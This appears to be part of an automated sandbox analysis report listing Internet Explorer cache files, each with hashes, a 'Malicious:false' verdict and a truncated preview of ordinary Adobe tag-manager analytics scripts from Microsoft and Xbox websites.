                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):517
                                                                                                                                                                                                              Entropy (8bit):5.338071106133214
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefYp5Hfuct/BefYp5HfTLgUl10aCKAnKofyKoAVZwuBB:DYb/uct/BuYb/YUl1NCVBfyBMZwuT
                                                                                                                                                                                                              MD5:53911A895AB80C64134DD97888EABBFC
                                                                                                                                                                                                              SHA1:2674ADFC5ED0082FFA79CFFEAA199494BB6DE94C
                                                                                                                                                                                                              SHA-256:134B0D39D9725DBF5B9583084B46296281B4DBCBD471648AD72DC8E10E6AD856
                                                                                                                                                                                                              SHA-512:CA8AC936D0DC47509982801463A38BBEC10357C950EA93097DFFC0CE83327ECD3F7B1B3DF1C8EEFF1C2497454571B0E3E0E6655A152844E3368B1634ADBB3F99
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC14999a828e04437b9286a3e42d5f4876-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC14999a828e04437b9286a3e42d5f4876-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC14999a828e04437b9286a3e42d5f4876-source.min.js', "null!=window.wdgtagging&&function(a,g){var t=function(){g.init(\"3j9k6rpcy1\")};a.category_all_status||a.category.analytics.status?t():a.category.analytics.queue.push(t)}(window.wdgtagging,window.wdgtagging.clarityTag);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC1d7d9ae536184751b8d91b732e62674a-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):794
                                                                                                                                                                                                              Entropy (8bit):5.451366490522334
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:Dr2uct/Bur2YU9fHRfK5T/wX4K/CVB/BM6wuZS:Dat/BunsxfUYX44OZM6m
                                                                                                                                                                                                              MD5:E297A8911BCC976B9A4E324AA6DF4ED7
                                                                                                                                                                                                              SHA1:D2006C0A2793331E624A8CC86940D15E0312C26C
                                                                                                                                                                                                              SHA-256:24F4EE67FD5AE530D4D6FFA1339E6356523622984FC711FEB8C80189FCCC4835
                                                                                                                                                                                                              SHA-512:E1DCA75B6008DA7E8F9C112AA6AC215EEBA7C0E99870EB1B77E7D2A99D3E4670C703732DF6635FD47EE1F3A3EE7CE3C83FDD4A26F756D46EB6A6CD4553CB5AAB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC1d7d9ae536184751b8d91b732e62674a-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC1d7d9ae536184751b8d91b732e62674a-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC1d7d9ae536184751b8d91b732e62674a-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.clicktale&&(window.ClickTalePIISelector=\".msame_Header_name,.msame_Drop_active_name,.msame_Drop_active_email\",function(a,e,t){var i=function(){t(\"<style type='text/css'>#clicktaleCrossDomain{ display:none;} </style>\").appendTo(\"head\"),e.init(\"5f71df01-502d-46ad-87a9-26eefe403304.js\")};a.category_all_status||a.category.analytics.status?i():a.category.analytics.queue.push(i)}(window.wdgtagging,window.wdgtagging.clicktale,window.jQuery));");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC29630bf202964b099de08044e2f57835-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1340
                                                                                                                                                                                                              Entropy (8bit):5.4141537865803135
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DrZvect/BurZvoUkzPKIHXUtlt7eOSt7HfUDOZUD71lKI/pwuPn/:Ddlt/BudglbKI3MT7l+7/VZKrKIRJ
                                                                                                                                                                                                              MD5:67A41D87F044C6B4E734B3AF08911CE6
                                                                                                                                                                                                              SHA1:CB337634DFF2072C9B608426E50E9C6FD2C6A919
                                                                                                                                                                                                              SHA-256:C132600170577BC9924878641298085B292580DB74F910621F860918941D3911
                                                                                                                                                                                                              SHA-512:C4715A8F4FD237DFAF1DB99A1D19E8D0C57B69982600380DFCF0D473195F8A3391C4E50A2DCC55813D3F907472574DE7D4F65DF7F7EC2050F7A09369446CB76A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC29630bf202964b099de08044e2f57835-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC29630bf202964b099de08044e2f57835-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC29630bf202964b099de08044e2f57835-source.min.js', "null!=window.wdgtagging&&function(t,a){var e,o,g,n,c,s;e=\"www.xbox.com\"===(s=window.location.host)||\"xboxdesignlab.xbox.com\"===s||\"gear.xbox.com\"===s||\"dreamscape.xbox.com\"===s||\"arcadecontest.xbox.com\"===s?\"prod\":\"test\";var i=window.location.pathname.toLowerCase().split(\"/\"),l=1;if((o=i[l])?o.match(/^..-.*-..$/)?(g=o.split(\"-\")[0],n=o.split(\"-\")[2]):o.match(/^..-.*$/)?(g=o.split(\"-\")[0],n=o.split(\"-\")[1]):n=g=\"\":n=g=\"\",\"xboxdesignlab.xbox.com\"===s||\"gear.xbox.com\"===s){if(l=2,\"homepage\"!=(c=a.tlcStr(i[l],\"homepage\")))for(l++;l<i.length;)c+=\"/\"+i[l],l++}else if(l+=1,\"homepage\"!==(c=a.tlcStr(i[l],\"homepage\"))){for(l++;l<i.length;)c+=\"/\"+i[l],l++;c=a.tlcS
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC42cc43b77d0041fc9113b6db84b6627c-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1969
                                                                                                                                                                                                              Entropy (8bit):5.24751656551256
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:DZt/BulJfquRaVSHqV7wnBzAztTCKJtgy8kZLf:lBBK1RXKRiONJtlr
                                                                                                                                                                                                              MD5:169B887E7365A4D2BB55AEEB79C5FA5D
                                                                                                                                                                                                              SHA1:F4D3AD967D6EC821E36C039EF03379989C36F81D
                                                                                                                                                                                                              SHA-256:EC0BAB6C85E440206C35C3123418A1772D15D867891A276A0339F25168F93CE0
                                                                                                                                                                                                              SHA-512:CB9368CB520781675BF8DD4F80ADA683AA4CD244B489E8AFEED5684F761D98CD3201743328ED8CCDE23F5676A68B0BE43C4974C3478ECE4388014BF52D718BB9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC42cc43b77d0041fc9113b6db84b6627c-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC42cc43b77d0041fc9113b6db84b6627c-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC42cc43b77d0041fc9113b6db84b6627c-source.min.js', "location.pathname.match(/\\/..-..\\/promotions\\/stranger-things\\/challenge/gi)&&null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&(window.wdgtagging.data=window.wdgtagging.data||{},function(t,a,n,i,e){e(\".step1:not([data-bi-scn])\").each(function(){e(this).attr(\"data-bi-scn\",\"stranger thing step 1\");var t={behavior:awa.behavior.STARTPROCESS,uri:location.href,contentTags:{scn:\"stranger thing challenge\"}};awa.ct.capturePageAction(this,t)}),e(\".guess-container .guess-slot button:not([data-bi-scn])\").each(function(t){var a=t+1;e(this).attr({\"data-bi-name\":\"box-\"+a,\"data-bi-scn\":\"stranger thing challenge\"})}),e(\".guess-container .guess-box button:not([data-bi-scn])\").each(f
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC5f812135e64f48ad85ea100034bc60a2-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):6332
                                                                                                                                                                                                              Entropy (8bit):5.335023078316825
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WB+3+u1vwkOIOU574BraYQNRmDzB3Jf1bjZ6x8br8bWHcGdXG84HQMqhuG:Wo+hkOI5791UDzB3JhjZ6x8br8bWHcG9
                                                                                                                                                                                                              MD5:4BC93CF00DEB00BDE824B6A12D992899
                                                                                                                                                                                                              SHA1:726B92D6E3DC1E3DD458E703023188F1EE0B07D4
                                                                                                                                                                                                              SHA-256:C78F20B3A3BC3AADC5E8B82B45632F029E474AD9AFCE4F4D9F5DDEE7A68BB8C4
                                                                                                                                                                                                              SHA-512:345A154E6387A02DECDFD9231033267C74ED213DA90CEBB396B050C7A7ACB8198A9F4FA484CCE6419FFE3E6C6560229CE9868CFE1337AEC3B60AC55B511F5EFE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC5f812135e64f48ad85ea100034bc60a2-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC5f812135e64f48ad85ea100034bc60a2-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC5f812135e64f48ad85ea100034bc60a2-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(t,e,w,f){window.location.pathname;var m=window.location.href;w.wdgVideoTagging=!1,w.videoTaggingInit=function(){var g=awa.ct.captureContentPageAction;w.wdgAttachedEvent={},w.wdgVideoName={},awa.ct.captureContentPageAction=function(o){if(239<o.behavior&&o.behavior<253&&240!=o.behavior&&250!=o.behavior&&251!=o.behavior);else if(253==o.behavior)g(o);else if(240==o.behavior){var i=o.contentTags.vidid,d=o.contentTags.vidnm,c=!1,r=f(\".c-video-player > .f-core-player\").find(\"video\");r.length&&r.each(function(t){var e=this,a=f(e).closest(\".c-video-player\").attr(\"data-player-data\"),n=\"\";(a=JSON.parse(a)).metadata&&a.metadata.video
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC69b31008c50e44318e064df1bd9de728-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1298
                                                                                                                                                                                                              Entropy (8bit):5.235773043263682
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DYbSfict/BuYbSfEU9YlGUeW3jW3P04931OtbICZ7iZ+cvvqWj7iZLPItGvwuF2P:DHt/BumpeWTW/04wsfIcvv+6Evcn
                                                                                                                                                                                                              MD5:7E0B8F787CB035BDB7FB26A41526CCE6
                                                                                                                                                                                                              SHA1:28CECB68F40A2ED23750ECFE500085FCC7E6EF2C
                                                                                                                                                                                                              SHA-256:B9AEE9B89ADE9A3D3967D6FA6656DD1F0E7C90CC33D860B1A17DD407E547F076
                                                                                                                                                                                                              SHA-512:F265C33F7E4128F64362BDF5EE869EB83F26317D08481EB3AD37C76D7D73DB4DB965D8482161013388982012569F704833440E28C8688D0126868D60038AC623
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC69b31008c50e44318e064df1bd9de728-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC69b31008c50e44318e064df1bd9de728-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC69b31008c50e44318e064df1bd9de728-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.linkedin&&function(e,n,i,t){var o=function(){n.init(\"7850\")};try{if(e.siteConsentLoopCountLinkedIn=0,\"undefined\"==typeof window.mscc&&\"undefined\"==typeof window.siteConsent)o();else if(\"undefined\"!=typeof window.mscc&&\"undefined\"==typeof window.siteConsent)if(\"function\"==typeof window.mscc.hasConsent&&window.mscc.hasConsent())o();else var s=setInterval(function(){if(t.checkSiteConsentObject()){clearInterval(s);var n=!1;n=window.siteConsent.getConsentFor(\"Analytics\"),window.siteConsent.getConsentFor(\"Advertising\")&&n&&o()}else 500<e.siteConsentLoopCountLinkedIn&&clearInterval(s);e.siteConsentLoopCountLinkedIn++},10);else if(t.checkSi
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC6fb1221373044729bc7f25fb104ba854-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1072
                                                                                                                                                                                                              Entropy (8bit):5.373408839752865
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:DYbapQct/BuYbapWU9lSmxFACfhKbeh1uJ4jLRLVwAux7uwuKIPn/:DJt/BukKTjf2exLuKr
                                                                                                                                                                                                              MD5:549A1F171D902320C0E398BAE0D684FA
                                                                                                                                                                                                              SHA1:110ED14461CAA387E30F44B73FE38429C451ECCE
                                                                                                                                                                                                              SHA-256:365F4FEAD326EEDDC5A268E01936A115337E83E833B54F85A2D1A98386F62BBB
                                                                                                                                                                                                              SHA-512:5D812DD0A5B83AF042D2DA4500CC269F18BADB2880862C3419EEE496DC4ECE6971183A257F32E59A82C298BD60AB31765F611C64533A641B00A34CFF8CDB1DEC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC6fb1221373044729bc7f25fb104ba854-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC6fb1221373044729bc7f25fb104ba854-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC6fb1221373044729bc7f25fb104ba854-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(a,e,g,t){var n,i,w={appId:\"Windows\",version:\"4\",coreData:{env:a.getData(\"env\"),market:a.getData(\"langLoc\"),pageName:a.getData(\"gpn\"),pageType:a.getData(\"pageType\")}};(\"undefined\"!=typeof isUserSignedIn&&\"1\"===isUserSignedIn||t(\".msame_TxtTrunc.msame_Drop_active_name\").length)&&(w.isLoggedIn=!0),w.prePageView=(n=a,i=g,function(){i.setMetaTag(\"awa-env\",n.getData(\"env\")),i.setMetaTag(\"awa-market\",n.getData(\"langLoc\")),i.setMetaTag(\"awa-pageName\",n.getData(\"gpn\")),i.setMetaTag(\"awa-pageType\",n.getData(\"pageType\")),i.setMetaTag(\"awa-ver\",\"ccStatus:\"+n.getCookieStatusInsights())}),e.load(w)}(window.wdg
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC80652bb24da2460f8e0165b4d64b503f-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):708
                                                                                                                                                                                                              Entropy (8bit):5.534462617418961
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefrde3dct/Befrde3ILgUlwbQxbuOj6lEXnvXvE9XLkPUypCHwub+dmkaS:Drdetct/BurdefUlwkxak64PvE1LKUf2
                                                                                                                                                                                                              MD5:ED65286830752F1B47C39DA49FD6796A
                                                                                                                                                                                                              SHA1:CB7007943C02A9A6C305ECCF3B64808381EA4999
                                                                                                                                                                                                              SHA-256:882AC4CF73C3AEBD250F4B41A9098A28CE52E2E15D61371DC2AAD0B4FF55A9BD
                                                                                                                                                                                                              SHA-512:2C874D9FECCB83FD7E729934DF68B085AE9C820BBCC16B1AE53979D7453B389746EFF27EE3E190E79B001D46E46CF8161E05F96BABC6CCF54833B27691C66E7C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC80652bb24da2460f8e0165b4d64b503f-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC80652bb24da2460f8e0165b4d64b503f-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RC80652bb24da2460f8e0165b4d64b503f-source.min.js', "null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(n,g,t,a){a(document).on(\"mousedown\",\"a[href*='aka.ms/XboxInstaller'], a[href*='XboxInstaller.exe'], button[data-cta-href*='XboxInstaller.exe']\",function(){a(this).attr({\"data-bi-bhvr\":\"DOWNLOADCOMMIT\",\"data-bi-prtnm\":\"ms store\"})})}(window.wdgtagging,window.wdgtagging.jsll,window.wdgtagging.util,window.jQuery));");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RC95d5954deda24aa780e2bd87a6eabf8f-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2996
                                                                                                                                                                                                              Entropy (8bit):5.3605387007952885
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:DogJt/BuogkmTcmF8j4cELlGCnSwnDSRoSNiNcmF6RFuiWlW/04AvDR/YGH:8CBBZ0LS5zi98RZWlW//EZ
                                                                                                                                                                                                              MD5:480E407D8461C86C2C3B5BD4C69BCCD3
                                                                                                                                                                                                              SHA1:C2E16D65CE2FABD560C146C86E56CBFA6787E9AE
                                                                                                                                                                                                              SHA-256:5A7CD7E1106D38FBE5657EE0368A47877E339A2385C0C84D8039AFC0E21FD0E9
                                                                                                                                                                                                              SHA-512:B16BE23B950C4D3180C208ABAB46CD941E7A0043AB004E9CC9F7CCBBA1ED97F1DBB804E2D56EE673F1861E0514D89CC1524234025006553B28105898EFEE919F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC95d5954deda24aa780e2bd87a6eabf8f-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC95d5954deda24aa780e2bd87a6eabf8f-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RC95d5954deda24aa780e2bd87a6eabf8f-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.facebook&&function(n,c,d,l){var e=function(){function e(t){var e=c.getProductInfo(t),n={content_name:r.content_name||\"\",content_id:e.id||t.attr(\"data-bi-prodid\")||t.attr(\"data-bi-product\")||\"\",content_type:\"product\",lang_locale:r.lang_locale||\"\",partner:e.retailer||t.attr(\"data-bi-prtnm\"),cta:e.cta||jQuery.trim(t.text())||t.attr(\"data-bi-name\")||\"\"};d.trackEvent(\"trackSingle\",d.globalpixelId,\"AddToCart\",n)}jQuery(\"meta[name='MscomContentLocale']\").attr(\"content\");d.globalpixelId=\"1770559986549030\",d.init(d.globalpixelId);var r={content_name:n.getData(\"gpn\")||\"\",market_name:n.getData(\"loc\")||\"\",lang_locale:n.getDa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RCbec07f7149ab4e7d832205be01626a5d-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):8725
                                                                                                                                                                                                              Entropy (8bit):5.283496317371422
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:lBzXIxE6GJblHvdOcL0z8bvXJWNiqJgRCQlSbZwZmN:lJMGBlH1Oc4zWJW4qJgRCQlSbZGmN
                                                                                                                                                                                                              MD5:7AFDC2A8F09144909DB36DA94482E023
                                                                                                                                                                                                              SHA1:13655D82930FB7351A715934D4B9942C6E74C092
                                                                                                                                                                                                              SHA-256:6FBC1CF116D4446AFF35CA4E3ED373703842D248F886E729F115DC5BF35F7E65
                                                                                                                                                                                                              SHA-512:0752D9AA49AEDDFFAC5E7FE8A276911AB3CE92F4F9CCEC1AE87C04B78743E2A84C294ECE115368D84FEA1D99B93DC1A6F0951C346A6A7A7083E56C7E3F143ACC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCbec07f7149ab4e7d832205be01626a5d-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCbec07f7149ab4e7d832205be01626a5d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCbec07f7149ab4e7d832205be01626a5d-source.min.js', "location.pathname.match(/\\/windows\\/help-me-choose\\/?/gi)&&null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&(window.wdgtagging.data=window.wdgtagging.data||{},function(l,t,a,e,y){jQuery(\"META[name='awa-pageType']\").length<1&&e.setMetaTag(\"awa-pageType\",\"HMC-page\"),(a=a||{}).sdata=a.sdata||{};var k=a.sdata;k.attachedCompleteProcess=!1,k.started=!1,\"en-us\"==window.wdgtagging.getData(\"langLoc\")?k.qOrder=k.qOrder||{usage:\"1\",screensize:\"2\",brands:\"3\"}:k.qOrder=k.qOrder||{usage:\"1\",performance:\"2\",ports:\"3\",screensize:\"4\",brands:\"5\",priority:\"6\"},k.questions={};var T=k.questions;y(\".questions-panel fieldset\").each(function(){var t=\"q\"+k.qOrder[y(this).attr(\"
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RCc17a59b7b91644d889a1351d6aa1b24b-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):9319
                                                                                                                                                                                                              Entropy (8bit):5.224118288521857
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:kBMvprGN7/gQ/1Mh/WwV1rMT9DRQ/1srbOqVwP2+PneINVWY2:kShrGN7d4/WwV1rMT5uEbJ5+3VWY2
                                                                                                                                                                                                              MD5:6F0B77F3A2739E42D075F576FD417B44
                                                                                                                                                                                                              SHA1:1577224E9E6F302BA20199827A777A6117F71221
                                                                                                                                                                                                              SHA-256:6447EB1E7ACF0017415F8AA5870BE16B7365FFA6EAAC28C1C799539385839B04
                                                                                                                                                                                                              SHA-512:06E97D219BD29F77666A7325DA0CC82B632EC7BFC95D8DA9A9AFCFD3E15A1FD78D76C08D768AE5E96FCBEAF1D7C13DE0FD3148F7261E438E61ECCDC5996BE728
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCc17a59b7b91644d889a1351d6aa1b24b-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCc17a59b7b91644d889a1351d6aa1b24b-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCc17a59b7b91644d889a1351d6aa1b24b-source.min.js', "null!==window.wdgtagging&&null!==window.wdgtagging.jsll&&function(t,i,c,w){window.location.pathname,window.location.href;c.vList={},c.changeAppId=\"JS:XboxWeb\",c.videoAPI=!0,c.iframeVideoTaggingConstructor=function(t,i,e,a,o){c.vList[t]={},c.vList.inLightBox=!0,c.vList[t].videoName=i,c.vList[t].isEnded=!1,c.vList[t].isMuted=o||\"\",c.vList[t].isloop=\"\",c.vList[t].shouldCapture=!0,c.vList[t].paused=!1,c.vList[t].lastSentPercentage=-1,c.vList[t].started=!0,c.vList[t].completed=!1,c.vList[t].myTimeStamp=Math.floor(Date.now()/1e3),c.vList[t].wdgVideoObject={},c.vList[t].wdgVideoObject.behavior=\"\",c.vList[t].wdgVideoObject.actionType=e||\"\",c.vList[t].wdgVideoObject.contentTags={},c.vList[t].wdg
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RCd898c8a8376b41f88f24c93b8645f178-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):9256
                                                                                                                                                                                                              Entropy (8bit):5.229010626796988
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:0BasDMQCvC7mIlmRvu19KFd4nRYw85glFn3K6dN0iX+3x+oS+y+p6:0hMjIlmgZRJN0w
                                                                                                                                                                                                              MD5:AD710B2D77106B8C94B2176A7D0D9D2A
                                                                                                                                                                                                              SHA1:218E1A7EC0140A054B940DC81B707C28BCA624C9
                                                                                                                                                                                                              SHA-256:B2C02822F38DD204B7B80CC5D47BC7BD4373E5A7769EB7B3138C528FEBFAB601
                                                                                                                                                                                                              SHA-512:ED07F9D959D1C90D436C10E32138C19E7284907E6475CA8E1445D6F3121C89DFE28DBFA8D151B21FA06B121F1DEEF1992040BE9FAD3033FA0CD31388674E705A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCd898c8a8376b41f88f24c93b8645f178-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCd898c8a8376b41f88f24c93b8645f178-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCd898c8a8376b41f88f24c93b8645f178-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(e,r,u){r.lineage={main_sel:\"MAIN\",zone_id:\"a3\",sec_custom_sel:\"\",grp_custom_sel:\"\",pnl_custom_sel:\"\",subpnl_custom_sel:\"\",exclude_sec_sel:\"\",after_sec_tag:!1,after_grp_tag:!1,after_pnl_tag:!1,after_subpnl_tag:!1},u.isDebug=!1,r.lineageSetupCounter=1,\"1\"===u.readCookie(\"debug\")?u.isDebug=u.readCookie(\"debug\"):-1<location.search.indexOf(\"debug=1\")&&(u.isDebug=!0),u.lineageDebug=function(e){u.isDebug&&console.log(e)},u.lineageDebug(\"JSLL Core Lineage Start\"),u.getLineageName=function(e,a){return e.attr(\"data-lineage-name\")||e.attr(\"data-productid\")||e.attr(\"data-sku\")||e.attr(\"data-bigid\")||e.attr(\"data-
